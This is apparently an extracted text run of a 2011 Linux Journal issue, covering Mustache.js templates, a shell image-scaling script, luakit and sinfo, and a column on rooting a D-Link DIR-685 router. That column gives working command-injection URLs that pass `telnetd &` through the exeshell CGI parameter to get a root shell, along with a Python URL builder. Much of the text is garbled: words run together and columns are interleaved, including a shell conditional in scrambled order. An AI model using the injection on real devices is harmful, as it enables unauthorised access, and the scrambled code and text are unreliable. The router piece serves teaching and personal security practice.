    var html = Mustache.to_html(template, template_vars);
    $('#target').html(html);
});
</script>
</head>
<body>
<h1>Testing testing</h1>
<p>This is a paragraph</p>
<div id="target">This space for rent</div>
</body>
</html>

Loops and Conditionals

Remember when I wrote that I wouldn't call Mustache.js "logic-less templates", because the templating language still includes conditionals? Well, now you can see what I meant. (I should add that I'm


fairly convinced I normally don't want code to be evaluated/executed in the template. But, conditionals and loops are two things that every useful templating system I've used has incorporated, and they are a necessary piece of logic for templates to be useful.)

If you look at Listing 3, you'll see how to create loops. I have added an array ("children") inside my template_vars variable. But instead of saying {{children}} to retrieve the contents of the array, you instead say {{#children}} at the beginning of the loop and {{/children}} at its end. Mustache.js is smart enough to know what to do, and it repeats the block within these delimiters, once for each element of the array. To get the current array element itself, you use the special syntax {{.}}.

That's certainly some degree of logic, but it's nothing compared with the {{#mycondition}} tag, which begins the equivalent of an if-then statement. But wait, what are you checking? Well, if you're starting your condition with {{#mycondition}}, that means you're going to treat "mycondition" as a function, evaluating it at runtime and then displaying only the contents of the block (that is, the stuff between {{#mycondition}} and {{/mycondition}}) if the function returns "true".

Mustache has a bunch of other features too. It automatically escapes HTML by default, but it has a mechanism, {{{ }}}, that uses raw HTML, without cleaning up the < and > symbols that can be both annoying and potentially dangerous.
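The block-repetition behavior of {{#children}}...{{/children}} can likewise be sketched in a few lines of plain JavaScript (again, a toy illustration rather than Mustache.js itself; the name renderSection is mine):

```javascript
// Toy expansion of {{#key}}...{{/key}} sections: arrays repeat the block
// once per element ({{.}} is the current element); other values show the
// block once if truthy and hide it entirely if falsy.
function renderSection(template, vars) {
    return template.replace(
        /\{\{#(\w+)\}\}([\s\S]*?)\{\{\/\1\}\}/g,
        function (match, key, body) {
            var value = vars[key];
            if (Array.isArray(value)) {
                return value.map(function (item) {
                    return body.replace(/\{\{\.\}\}/g, String(item));
                }).join("");
            }
            return value ? body : "";
        });
}

console.log(renderSection("{{#children}}<li>{{.}}</li>{{/children}}",
                          { children: ["Atara", "Shikma", "Amotz"] }));
// -> <li>Atara</li><li>Shikma</li><li>Amotz</li>
```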
So, you have the flexibility to replace text as appropriate in your application.

The examples I have provided obviously are somewhat contrived and simple. Fortunately, the syntax of Mustache.js is simple enough that it shouldn't take very long at all to incorporate it into your work.

Conclusion

Mustache is a straightforward, but powerful, templating system for JavaScript. If you're starting to put together a Web application that needs to rewrite parts of the text based on AJAX calls or JavaScript output, or if you're writing a one-page JavaScript-based application, you certainly should look into Mustache.js. The home page on GitHub has good documentation, and other tutorials and documents are linked from there as well.■

Reuven M. Lerner is a longtime Web developer, architect and trainer. He is a PhD candidate in learning sciences at Northwestern University, researching the design and analysis of collaborative on-line communities. Reuven lives with his wife and three children in Modi'in, Israel.

Resources

The home page for Mustache is mustache.github.com.

For an interesting analysis of Mustache.js, as well as where it could be improved (and a description of a fork), read Yehuda Katz's blog entry at yehudakatz.com/2010/09/09/announcing-handlebars-js.


COLUMNS / WORK THE SHELL

Working with Image Files
DAVE TAYLOR

Roll your own image inclusion utility.

As an old-school tech guy, I can appreciate all the shiny new widgets we have on our computer applications, but I still usually prefer a command line and being able to fine-tune exactly what's produced rather than just hope it'll work. This is particularly true when it comes to HTML generators and Web page creation tools. You need only look at the output of Microsoft Word's "Save as HTML" feature to know what I mean. (All right, that's not a fair comparison because it's so bloody ghastly that even the Microsoft people avoid using Word for this purpose.)

It's fair to call me a prolific writer too, and much of what I write is for the on-line world. This gives me the chance to compare different tools, and since I'm a bit of a perfectionist, it also lets me see which content creation tools allow fine-tuning and which trap you in the world their developers have created.

In particular, I'm thinking of WordPress, a super-popular open-source blogging utility, versus Movable Type, a more closed development tool that is unfortunately a bit in limbo due to a change in corporate ownership. My main blog, AskDaveTaylor.com, operates on Movable Type (as does the Huffington Post, among others), whereas the film reviews I write for ScienceFiction.com come through its WordPress system. WordPress makes it complicated to add images to your articles, and when I do add them, I find that I invariably switch into the HTML source and tweak the code produced.
If nothing else, there's always insufficient padding between the image and the adjacent text, which is something I often puzzle about—how can I be the only person who notices? Movable Type could have the same issues, but because it doesn't have such a fancy HTML edit widget, it instead has encouraged me to roll my own image inclusion utility, and that's what we're going to examine this month.

scale.sh

The purpose of the utility is to take an image, either in GIF, JPEG or PNG format, calculate its size and produce the HTML necessary to have it properly included in a blog post. To make it more useful, it can automatically scale the image dimensions in the HTML, add image


borders if needed and even add captions as specified. Here's a simple example of it at work:

$ scale 1 ../Desktop/test-image.png

It has lots of smarts, including the knowledge to convert the local image into an equivalent URL that instead references the archive layout on my server, calculates height and width, and even includes an ALT attribute (which is good SEO juju) based on the name of the file.

The 1 in the command invocation says that I want the image to be at its full size (scale=100%). To make it smaller, say 75%, I could invoke it as scale 0.75, and if I wanted to constrain it by a specific pixel width, perhaps because of a page layout issue, I can do that too with scale 200.

The two most important lines in the script are those that invoke the terrific ImageMagick command-line utility identify and parse the image dimensions:

width="$(identify $filename | cut -f3 -d\ | cut -f1 -dx)"
height="$(identify $filename | cut -f3 -d\ | cut -f2 -dx)"

Extract a multiplier based on the starting parameter, and it's then straightforward to use bc and get the new dimensions:

width="$(echo "$width * $multiplier" | bc | cut -d. -f1)"
height="$(echo "$height * $multiplier" | bc | cut -d. -f1)"

To understand this, imagine we're using the original image with its 256x384 dimensions. If we constrain it to a max of 200 pixels in width, the multiplier can be calculated as:

multiplier="0$(echo "scale=2 ; $maxwidth / $width" | bc)"

Or, if we want to do the math ourselves, 200/256 = 0.78. Calculate both dimensions by that figure and we arrive at the scaled-down image size of 200x300.


If the user specifies a percentile multiplier, say 0.75 for a 25% reduction in image size, then the math is even easier because we don't have to calculate the multiplier. It already has been specified by the user: 0.75. The resultant image: 192x288. Not rocket science, but darn helpful.

The Search Engine Impact of Scaled Images

The problem that creeps up here is one that's tied more to search engine optimization and so-called SERP, search engine results placement. In a nutshell, slow-loading pages now are penalized in the search results, and if you're loading up lots of large images and then automatically scaling them down with the attributes in your HTML code, you're hurting your page and its ability to rank well in user searches—not good.

If it's a 10% shrinkage or you're just shaving off a few pixels to make it fit a particular page design (for example, I keep my images to 500 pixels or narrower on my DaveOnFilm.com site), no worries. At that point, the difference in file size is usually negligible.

This brings us to another important task that scale.sh performs: testing and warning if you're going to be scaling an image down to the point where you can experience an SERP penalty. Here's how that's calculated:

sizediff=$(echo "scale=3; ( $width / $owidth ) * 100" | bc | cut -d. -f1)
I’ve set anarbitrary limit so that anything that’s morethan a 20% reduction in size is worthy ofgenerating a warning message, like this:if [ $sizediff -lt 80 ] ; thenfiecho "*** Warning: $filename scaled to $sizediff%"echo ""Sure enough, if we run scale.sh with the200-pixel width constraint, here’s what we see:*** Warning: ../Desktop/test-image.png scaled to 77%In my next article, I’ll dig farther intothe script and describe some of the tricksI’m using to generate the best, smartestHTML code I can manage. In the meantime,think about how you are adding imagesto your own on-line content and whetheryour method is optimized for both the userexperience and the search engines.■Dave Taylor has been hacking shell scripts for a really long time,30 years. He’s the author of the popular Wicked Cool Shell Scriptsand can be found on Twitter as @DaveTaylor and more generallyat www.DaveTaylorOnline.com.34 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM




COLUMNS / HACK AND /

Practice Hacking on Your Home Router
KYLE RANKIN

Why hack someone else when an ideal target might be lurking in your own network?

Although it's true that I tend to focus mostly on Linux in systems administration (after all, that is my day job), I've always had a secondary interest in security, whether it's hardening systems, performing forensics on a hacked system, getting root on a pico projector or even trying my hand at finding and exploiting vulnerabilities. Even though it's fun to set up your own Web services and attempt to exploit them, there's something more satisfying about finding vulnerabilities in someone else's code. The downside, of course, is that most Webmasters don't appreciate it when you break into their sites. However fun hacking is, at least for me, it isn't worth the risk of jail time, so I need to have my fun in more legal ways. This is where my wireless router comes in.

Wireless routers have a long history of being hackable. If you take any group of Linux geeks, you are bound to find a number of them who have, or have had, a member of the classic Linksys WRT series. If you look on-line, there are all sorts of custom firmware you can install to extend its functionality. Although it's true that on some versions of the router you have to jump through some crazy hoops to install custom firmware, it's still not the same kind of challenge as discovering and exploiting a vulnerability on a server. Although I have a stack of WRT54G routers, this article isn't about them; instead, it's about the D-Link DIR-685.

The D-Link DIR-685

I first became aware of the D-Link DIR-685 during a Woot-Off on woot.com. If you are familiar with Woot-Offs, you understand that when a new product shows up on the site, you have a limited time to decide whether you want to buy it before it disappears and a new product shows up. The moment I read the specs, I knew this router looked promising.
First, it was an 802.11n router,


and I was in the market to upgrade from my 802.11g network. Second, it had five different gigabit ports in the back along with two USB ports. Finally, as icing on the cake, it not only had this interesting-looking color LCD on the front that could show statistics, photos or other data, but you also could slot in a 2.5" SATA drive of up to 1TB and turn the thing into a small NAS. Based on the fact that it required an ext3 filesystem on the 2.5" drive, I reasonably could assume it even already ran Linux. I didn't have much time to see if anyone already had hacked into the router or created custom firmware, so I made up my mind and clicked the order button.

While I was waiting for the router to ship to my house, I did some extra research. Although unfortunately it looked like there wasn't any custom firmware I could find (this originally was quite an expensive router, so I imagine it didn't have a large install base), I did find a site from someone who documented how to open up the router and wire up and connect a serial port to it, so you could access the local serial console. I decided that in the worst case, if I couldn't find a simpler method, I always could just go that route.

When I got the router, I did the initial setup on my network via the Web interface and then looked one last time for any custom firmware or other method apart from a serial console to get root on the router. I wasn't able to find anything, but before I went to the trouble of taking it apart, I decided to poke around on the Web interface and see if I saw anything obvious. The first dead end came when I enabled the FTP service via the Web interface, yet was not able to find any known vulnerabilities with that FTP server that I could exploit.
Unlike when I got root on my pico projector, when I ran an nmap against the machine, I wasn't lucky enough to have telnet waiting for me:

PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

One Ping Only

As I continued searching though, I got my first clue: the ping test. The Web interface provides a complete set of diagnostic tools that, among other things, allows you to ping remote machines to test for connectivity on http://<router>/tools_vct.php (Figure 1). I figured there was a good chance that the PHP script just forwarded the hostname or IP address you typed in to a system call that ran ping, so I started by adding a semicolon and an ls command to my input. Unfortunately, there was a JavaScript routine that sanitized the input, but what I noticed was that after I submitted a valid input, the variable also showed up in the URL: http://<router>/tools_vct.php?uptime=175036&pingIP=127.0.0.1. I discovered that although the page used JavaScript to sanitize the input, it did not


sanitize the POST data. In fact, I could put just about anything I wanted as the value of pingIP, and it would not only accept it, but because the PHP page displayed the value of pingIP in the output, I also would see my variable output in the resulting Web page, which opened up all sorts of possibilities for JavaScript injection and XSS attacks. Of course, none of that would help me get root on the machine, so I started trying to figure out what kind of payload I could send that would allow me to execute system calls.

Figure 1. The Ping Test

No Escape

It was at this point that I searched online for a nice complete table of all of the URL escape codes. You may have noticed that whenever you type a space in a URL, for instance, browsers these days tend to convert it into %20. That is just one of many different escape codes for symbols that are valid to have in a URL in their escaped form. Table 1 shows some of the more useful ones for what I was trying to achieve.

Table 1. URL Escape Codes

ESCAPE CODE    CHARACTER
%3B            ;
%3F            ?
%26            &
%22            "
%3C            <
%7C            |
%60            `

So, for instance, to perform a simple test of command injection, you might attempt to add a sleep command. If the page seems to pause for that amount of time before it reloads, that's a good sign your command injection worked. So, to attempt a sleep command with that page, my encoded URL to set pingIP to "127.0.0.1; sleep 30" looked like http://<router>/tools_vct.php?uptime=175036&pingIP=127.0.0.1%3B%20sleep%2030.

"If it's PHP, there will be a hole."

I iterated through all sorts of different symbols and options to pass for pingIP, and nothing I tried seemed to have any effect. I was talking to a friend of mine about what I was trying and how I wasn't turning up any usable hole yet, and I got the encouraging reply, "If it's PHP, there will be a hole." I figured that if I already managed to find a JavaScript injection XSS vulnerability, if I kept looking, I had to find some way in. I decided to forget about the ping page for a while and try to find some other vulnerability.
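If you want to build encoded payloads like the pingIP example yourself rather than look each character up, a few lines of portable shell will do it (a sketch; the function name urlencode is mine, and it assumes single-byte ASCII input):

```shell
# Percent-encode a string per the escape table above: unreserved
# characters pass through, everything else becomes %XX.
urlencode() {
    s=$1
    out=""
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}        # first character of $s
        s=${s#?}               # rest of $s
        case $c in
            [a-zA-Z0-9.~_-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;
        esac
    done
    printf '%s\n' "$out"
}

urlencode '127.0.0.1; sleep 30'
# prints 127.0.0.1%3B%20sleep%2030
```

The `printf '%02X' "'$c"` trick relies on POSIX printf treating a leading quote as "give me the character's numeric value".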


My next clue came when I looked into the system tools page at http://<router>/tools_system.php (Figure 2). A glaring item on that page was the reboot button. I figured there was at least a chance that it made some sort of system call, so I looked into the source for that Web page in my browser and noticed that when you clicked on the reboot button, the JavaScript called this URL:

http://<router>/sys_config_valid.xgi?exeshell=submit%20REBOOT

There's nothing more reassuring than a CGI variable named exeshell. Because I had all sorts of example encoded URLs from my ping test, I decided to try enclosing a sleep command in backticks to see if it would exit to a shell—lo and behold, it worked!

Figure 2. System Tools Page

The Payload

Okay, so now I had a viable way to execute shell commands on the system. The next question was how I was going to take


COLUMNSHACK AND /advantage of this to log in remotely. Myfirst approach was to try to execute netcat,have it listen on a high port, and use the-e argument so that it would execute ashell once I connected to that port—a poorman’s telnetd. After all, many consumerdevices that run <strong>Linux</strong> use BusyBox fortheir shell, and BusyBox often includes aversion of netcat that supports this option.Unfortunately, no combination of netcatarguments I tried seemed to do anything. Iwas starting to think that I didn’t get a shellafter all—that is, until I enclosed reboot inbackticks, and it rebooted the router.After the machine came back up, Idecided it was possible netcat just wasn’tinstalled, so it was then that I tried thefateful URL: http:///sys_config_valid.xgi?exeshell=%60telnetd%20%26%60.In case you don’t want to look it up,that converts into `telnetd &` as input.Sure enough, after I ran that command, mynmap output looked a bit different:PORT STATE SERVICE21/tcp open ftp23/tcp open telnet80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-dsThen, I fired up telnet from that same machine:$ telnet Trying ...Connected to .BusyBox v1.00 (2009.07.27-14:12+0000) Built-in shell (msh)Enter 'help' for a list of built-in commands.#I not only got a shell, but also a root shell!When I ran a ps command, I noticed mytelnetd process on the command line:sh -c `telnetd &` > /dev/consoleIt turns out any command you pass to exeshelljust gets passed to sh -c, so I didn’t needany fancy escaped backticks or ampersands,exeshell=telnetd would work just fine.ConclusionSo, what’s the moral to this story? Well, forone, don’t open up hardware and void itswarranty to get to a serial console when youcan get a shell from the Web interface. Two,JavaScript isn’t sufficient to sanitize inputs—ifyou accept POST data, you need to sanitizeit as well. Three, passing an input variabledirectly to sh is probably a bad idea. 
Finally, next time you want to try your hand at a bit of penetration testing, you don't have to go any further than your own network. Hacking your own hardware can be just as fun as (and safer than) hacking someone else's.■

Kyle Rankin is a Sr. Systems Administrator in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users' Group.

40 / OCTOBER 2011 / WWW.LINUXJOURNAL.COM
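The whole exploit above reduces to URL-encoding a shell command into the exeshell CGI parameter. Here is a minimal sketch of that encoding step; the router address is a placeholder (the column redacts the real one), and the function name is mine:

```python
# Sketch of building the injected URL described in the column.
# ROUTER is a placeholder TEST-NET address, not the author's device.
from urllib.parse import quote

ROUTER = "192.0.2.1"

def exeshell_url(command):
    # The CGI hands the exeshell value straight to `sh -c`, so the
    # command only needs percent-encoding to survive the URL.
    return "http://{}/sys_config_valid.xgi?exeshell={}".format(
        ROUTER, quote(command, safe=""))

print(exeshell_url("`telnetd &`"))
# → http://192.0.2.1/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60
```

That reproduces the encoded form of the fateful URL; and as the column notes, the backticks turn out to be unnecessary, since whatever you pass ends up in sh -c anyway.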




NEW PRODUCTS

RunRev's LiveCode Server

LiveCode Server from RunRev is a new and novel solution that provides back-end and cloud services for mobile or desktop applications and processes. The advantage of LiveCode Server, says RunRev, is to enable developers to create data-intensive apps with confidence that the sheer volume of information and files required are kept securely in the cloud and readily accessible. LiveCode is a programmable server environment that allows developers to write flexible CGI scripts, rather than obscure symbolic languages. An English-like programming language is used to describe server application logic quickly and build and deploy solutions rapidly. Users can use the LiveCode server as a standalone engine to install on their own Mac OS or Linux hardware or utilize RunRev's On-Rev hosting service.
www.runrev.com

Sencha Touch Charts

The thrill of Sencha Touch Charts lies not merely in the ability to explore complex data sets with simple gestures on a smartphone or tablet, but more important, to do so using HTML5. Sencha says that its new Web app development framework renders charts at the same level of fidelity as native apps without having to rely on native drawing packages. Sencha Touch Charts renders charts, captures multi-touch inputs and drives interactivity. A simple swipe will pan across a data set, whereas a "reverse pinch" will zoom into detail. Richer interactions, such as axis swaps, aggregation, filtering and more, are all enabled by similarly simple gestures. The HTML5 Canvas technology is fully supported by the latest WebKit browsers that ship with Android, Apple iOS, BlackBerry OS6 and HP WebOS.
www.sencha.com


SSVV Narasimha Rao's Sencha Touch 1.0 Mobile JavaScript Framework (Packt Publishing)

As long as we're on the topic of Sencha Touch, allow us to note that extensive help already is available, so you can utilize the platform to maximum benefit. Narasimha Rao's Sencha Touch 1.0 Mobile JavaScript Framework teaches all one needs to know to get started with Sencha Touch and "build awesome mobile Web applications that look and feel native on Apple iOS and Google Android touchscreen devices", says publisher Packt Publishing. Beginning with an overview of Sencha Touch, the book guides users through increasingly complex sample applications. Other topics include styling the UI, exploring Sencha Touch components and working with animations and data packages using comprehensive examples.
www.packtpub.com

Lantronix and Timesys' PremierWave EN

The new Linux-based, wireless device server PremierWave EN is a collaborative effort between secure communication technologies provider Lantronix and embedded Linux specialist Timesys. PremierWave EN allows design engineers and OEMs to add Wi-Fi and Ethernet networking to virtually any device easily. As a result, companies can transmit medical, financial, customer or other important data securely across corporate networks. Lantronix applications, such as the Advanced Applications Suite, tunneling applications, an enterprise-class command-line interface, management capability using a standard Web browser, diagnostic utilities, Ethernet-to-Wireless-LAN bridging and virtual IP, are standard. A subscription to Timesys' LinuxLink embedded Linux software development framework also is included.
www.lantronix.com and www.timesys.com


McObject's eXtremeDB Cluster

Step one to database nirvana: clear your mind of the most undelicious fast-food item imaginable (that is, a McObject). Step two: with mind now clear, check out McObject's new eXtremeDB Cluster, which the company bills as the first clustering database system built especially for distributed embedded software and real-time enterprise applications. eXtremeDB Cluster manages data stores across multiple hardware nodes, which increases the net processing power available for data management; reduces system expansion costs; and delivers a scalable and reliable database solution for increasingly data-intensive real-time applications. According to McObject's benchmarks, eXtremeDB Cluster delivered a 161% throughput improvement when scaling from one node to four. Targeted applications include carrier-grade telecom, algorithmic trading applications, SaaS platforms and the like.
www.mcobject.com

Vector Fabrics' vfThreaded-x86 Tool

Take your pick—expletives and ibuprofen or Vector Fabrics' vfThreaded-x86 Tool—to take the pain out of the task of optimization and parallelization of applications for multicore x86 architectures. The cloud-based software tool, which is aimed at developers who write performance-centric code for high-performance computing, scientific, industrial, video or imaging applications, greatly reduces the time involved and the risks associated with optimizing code for the latest multicore x86 processors. By using thorough dynamic and static code analysis techniques, vfThreaded-x86 quickly analyzes code and guides the developer to make the right choices for partitioning code to separate cores. This includes examining cache hit/miss effects, data bandwidth to memories and bandwidth between individual code sections. An intuitive GUI provides code visualizations that highlight code hotspots and dependencies that might require partitioning trade-offs.
www.vectorfabrics.com


Scott Mueller's Upgrading and Repairing PCs, 20th Ed. (Que)

Besides our fealty to Linux, there may be nothing else besides tinkering with our PCs that defines our Linux geek identity. Therefore, we know that books like Scott Mueller's Upgrading and Repairing PCs, now in its 20th edition, will appeal to many of our readers. Publisher Que calls Mueller's book "the definitive guide to the inner workings of the latest PCs" and "with nearly 2.5 million copies sold, it's the best-selling hardware guide ever". The book contains extensive information on troubleshooting problems, improving system performance and making the most of today's best new hardware. The latest hardware innovations and repair techniques since the previous edition have been added. Ninety minutes of DVD video is included, covering insider information about several key PC components, including hard disk drives, power supplies, motherboards and so on. Besides presenting comprehensive coverage of every PC component, Mueller also covers overclocking, cooling, PC diagnostics, testing and maintenance.
www.informit.com

Cutting Edge's Power-Saving Cloud Archive

From the "saving green by going green" newsdesk is Cutting Edge's new Power-Saving Cloud Archive (PSCA), an energy-saving storage technology for the cloud. Cutting Edge describes PSCA's advantages to include "extremely high performance and scalability, a low acquisition cost, up to a 90% power savings and a new low in TCO for organizations that are struggling to address the relentless flood of unstructured data and longer retention times". Moreover, PSCA, says the company, "is the ideal solution for today's power-hungry storage environments where the cost to provide power and cooling for storage systems now actually exceeds the cost to acquire the equipment being powered and cooled". Cutting Edge's technology is a combination of its fifth-generation EdgeWare unified storage software and multi-tiered archiving, as well as innovative power-saving hardware and open systems.
www.cuttedge.com/psca

Please send information about releases of Linux-related products to newproducts@linuxjournal.com or New Products c/o Linux Journal, PO Box 980985, Houston, TX 77098. Submissions are edited for length and content.


NEW PROJECTS
Fresh from the Labs

luakit—Extensible Micro Browser
luakit.org/projects/luakit

Fellow control freaks, if you enjoy having dominion over just about every aspect of a program, I think you'll like this. Inspired by projects such as uzbl, and developed by fellow Perth-boy Mason Larobina, luakit is the Web browser for those who like the element of control. According to the Web site:

luakit is a highly configurable, micro-browser framework based on the WebKit Web content engine and the GTK+ toolkit. It is very fast, extensible by Lua and licensed under the GNU GPLv3 license.

It is primarily targeted at power users, developers and any people with too much time on their hands who want to have fine-grained control over their Web browser's behavior and interface.

Installation: Pre-made packages/binaries are available on the Web site for Gentoo, Arch Linux, Debian/Ubuntu and Fedora, along with the source code.

As for library requirements, the documentation says you need the following:

■ gtk2.
■ Lua (5.1).
■ lfs (lua filesystem).
■ libwebkit (webkit-gtk).
■ libunique.

It's hard to notice the discreet tabs, with black for active and gray for inactive, but they're very cool.


NEW PROJECTSand make, combining the two—interesting.If you run into any errors here, chances arethat you’re missing a library dependencysomewhere; pay close attention to the output.Finally, to install luakit, if your distro usessudo, enter:$ sudo make installThis lightweight browser seems to run YouTubewith Flash just as well as Firefox and Chrome.■ sqlite3.If your distro uses root, enter:$ su# make install■ help2man.On my Kubuntu system, the lfs packagewas called liblua5.1-filesystem0.If you’re using the sourceand running into dependencyerrors, it’s worth tryingout the above libraries’development packages(usually named -dev) and doingthe luakit installation again.If you’re running with thesource, grab the latest tarballfrom the Web site, extract it,and open a terminal in the newfolder. Enter the command:Usage The actual interface is ratherunique. Like the lovechild of Chromeand Vim, the interface is part sleek and$ makeI’m not sure what resourcesMason has used here, butthis make script is kind of likea cross between ./configureProject code that’s both documented and diagrammed—now I’veseen everything!WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 47


modern-minimalist, part old-school hacker. Entering a URL or even clicking Back may leave the uninitiated a little shocked, as the GUI elements one takes for granted are seemingly nonexistent. However, the two main UI elements unlock them immediately: right-clicking and the input bar.

Starting with the input bar, you can enter URLs with o, t or w to open URLs in the same tab, a new tab or a new window, respectively. Right-clicking provides controls like Back, Forward, Stop and so on.

On the subject of tabs, not only was I impressed by their presence in this lightweight browser, but they're also by far the coolest tabs I ever have seen. They nearly blend into the background (perhaps part of their mystique), and at first I didn't even notice their presence. Open some new tabs with t, and the tabs at the top of the browser start dividing evenly, with the active tab a strong black, and the inactive tabs techy-gray.

Much to my surprise (given luakit's minimalist nature), Flash appeared to work without any worries, with YouTube as my first test. Indeed, many pages I thought wouldn't stand a chance loaded in a way that was both accurate and stable.

Nevertheless, the actual browsing aspect is only half the equation when considering luakit, whose real appeal lies in its endless customizability.

luakit Keyboard Commands

These are the most important bindings for basic usage (see the documentation for more):

■ i — insert mode.
■ : — command mode.
■ Ctrl-z — passthrough mode.
■ o — open URL.
■ t — open URL in new tab.
■ w — open URL in new window.
■ d/Ctrl-w — close tab.
■ D/ZQ — close window.
■ ZZ — save session and close window.
The entire browser is constructed by a series of config files, which do all kinds of things, like change what parts of the browser are loaded and in which order, define button combinations and so on. Regarding this, Mason gave a great response to one of my leading questions that was long and detailed, and it will appeal to anyone who knows what they're doing. Check the Web site if you want to see it.

For the modder who is about to jump into coding, luakit's Web site has something I've never actually come across. Unlike 99% of us who just start coding randomly, the Web site has a whole Data Structure Index, explaining each file with flowcharts and


documented references—the way we were taught but always avoided!

If any programmers are looking to help out with luakit, Mason recommends porting a Firefox or Chrome plugin that you can't live without. A simple method for ad-blocking also would be greatly appreciated.

At the end of the day, this is one of those projects that will inspire great loyalty among its fans with its own unique style. And if any film-makers working on a hacker movie are reading this and looking for a browser that looks Neo-from-The-Matrix cool, this is the one.

sinfo—Advanced Network Monitoring
www.ant.uni-bremen.de/whomes/rinas/sinfo

Are you looking to set up some kind of network cluster, but dealing with many different computers, all of which are nearly impossible to keep track of? What if you're in charge of a room full of computers and also of those who are using them (some of whom may be looking to slack off or run something I'll politely dub "objectionable")? sinfo may be what you're looking for. According to its Freshmeat entry:

sinfo is a monitoring tool that uses a broadcast scheme to distribute information on the status of each computer on your local network. It supports CPU, memory usage, network load and information about the top five processes on each computer. sinfo uses ncurses to display the information in an attractive manner.

sinfo displays invaluable system information over multiple PCs for easy administration.

Further extending sinfo's use with the -s switch provides even meatier information.

Installation: A binary is available for those with Debian-based systems, such as Debian, Ubuntu and the like, and chances are that it's already sitting in your repository. Given that this software also includes a startup dæmon, sinfod, I thoroughly recommend taking the binary option if you can, because a great deal of the process is automated (it's also the version I cover here). Nevertheless, in the interests


of distro neutrality, I also cover the source version during the installation, as usual.

As far as library requirements are concerned, you need the following, according to the documentation:

■ ncurses: libraries for terminal handling (tested with version 5.7).
■ boost: peer-reviewed portable C++ source libraries using Boost.Bind and Boost.Signals (tested with version 1.42).
■ asio (>=1.1.0): a cross-platform C++ library for network programming (tested with version 1.4.1).

If you're compiling from source, you need the pesky developer packages as well (-dev). The number of packages under libboost- in particular is quite extensive, so if you run into any problems during make, the libboost libraries may be the culprit, requiring more of its packages before you can install properly.

For those running with source, once you have the library requirements out of the way, grab the latest tarball and extract it. Open a terminal in the new folder and enter the following commands:

$ ./configure
$ make

If your distro uses sudo:

$ sudo make install

If your distro uses root:

$ su
# make install

Before I continue, I should explain that sinfo is broken into two parts: the everyday application and the background dæmon. As for installing the dæmon, I'm going to leave this part to you, because it seems that just about every distro has a different method of dealing with startup processes (and the Debian package takes care of all that). Check the readme files in the source tarball and the Web site for more information if you're still using the source.

Usage: sinfo is a "semi-GUI" command-line program that's actually pretty easy to use, although advanced users can make it do some pretty cool stuff via command-line switches. To run the program in its basic mode, simply enter:

$ sinfo

Assuming that you have sinfo installed only on your machine for now, the information being displayed will be just that of your machine.
From this screen, you see all kinds of useful information, such as available memory, CPU utilization, hostnames and so on. The sinfo Keyboard Commands sidebar shows a list of the keyboard commands that drive sinfo, toggling parts of the program with a single keystroke. However, in this state, it's really just a glorified version of top. The whole point is that you can display information from


several machines at once to keep tabs on a LAN. If the other PCs on your network have sinfo in their distro's repository, it should be as easy as installing sinfo via apt-get and the like, then running the program on those machines. As soon as I did that on a second machine, voilà, both PCs were displaying under both installations. Keep installing it on other networked PCs, and the list will grow larger and larger.

Those are the basics out of the way, but what about the extended features? Obviously, I don't have the space to cover everything here (and you really should check the man page for more details), but let's look at some of my favorite features.

At the command line, if you add the -W switch (or alternatively --wwwmode) like so:

$ sinfo -W

the output changes from the usual top-like screen to HTML output instead—very handy for those into things like remote administration with automated Web pages and whatnot.

This is slightly redundant while in the sinfo user interface (simply press the s key), but it's awesome when doing some kind of command-line scripting: add the switch -s (or alternatively --systeminfo), and a big chunk of serious system information is output as well. As an example, my two machines


had the following extra information:

192.168.1.2 knightro-bigdesktop i686
Linux 2.6.32-27-generic #49-Ubuntu SMP Wed Dec
cpus: 4 MHz: 800.0
RAM: 3276.5 MByte swap: 7629.4 Mbyte
load 1min: 0.0 load 5min: 0.1 load 15min: 0.1

192.168.1.1 nhoj-desktop x86_64
Linux 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 0
cpus: 2 MHz: 1000.0
RAM: 2007.6 MByte swap: 2047.3 Mbyte
load 1min: 0.1 load 5min: 0.2 load 15min: 0.1
uptime 0 days, 19:13:03

This kind of information suggests many potential uses, and keeping watch and troubleshooting at LAN parties springs instantly to mind. If any one node is having trouble, there's a good chance that the host will be able to hit the ground running when trying to isolate the problem.

In the end, sinfo is not only well designed, but if it's installed as binary, it's also convenient. Ultimately, I think this application will carve out an instant niche for itself, and hopefully, it will turn into one of those standard applications that are so commonplace, they just become part of the landscape. Maybe porting it would do exactly that.■

John Knight is a 27-year-old, drumming- and bass-obsessed maniac, studying Psychology at Edith Cowan University in Western Australia. He usually can be found playing a kick-drum far too much.

sinfo Keyboard Commands

■ q — quit sinfo.
■ Page up, Page down — scroll the screen by one page.
■ Up arrow/u, down arrow/d — scroll the screen by one line.
■ Home — jump to the top line.
■ s — toggle display of system information.
■ o — toggle display of your own processes.
■ n — toggle display of network information.
■ D — toggle display of disk load.
■ t — toggle display of the top X processes.
■ c — toggle the scaling of the CPU load bars from "log", "lin" to full.

BREWING SOMETHING FRESH, INNOVATIVE OR MIND-BENDING? Send e-mail to newprojects@linuxjournal.com.
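Because each machine's -s output begins with a regular "IP hostname architecture" header line, as shown above, it scripts easily. A quick sketch of picking those lines apart (the regex and dictionary keys are my own, not part of sinfo):

```python
import re

# Sample lines in the shape shown by `sinfo -s` above.
SAMPLE = """\
192.168.1.2 knightro-bigdesktop i686
192.168.1.1 nhoj-desktop x86_64
"""

HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)\s+(\S+)$")

def parse_hosts(text):
    # Return one dict per host header line: IP, hostname, architecture.
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            hosts.append({"ip": m.group(1),
                          "host": m.group(2),
                          "arch": m.group(3)})
    return hosts

for h in parse_hosts(SAMPLE):
    print(h["host"], h["arch"])
```

A harness like this, fed from sinfo's output, could flag any LAN-party node whose load averages climb out of bounds.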


REVIEW
HARDWARE

Return to Solid State

Are modern SSDs worth the price if you use Linux? KYLE RANKIN

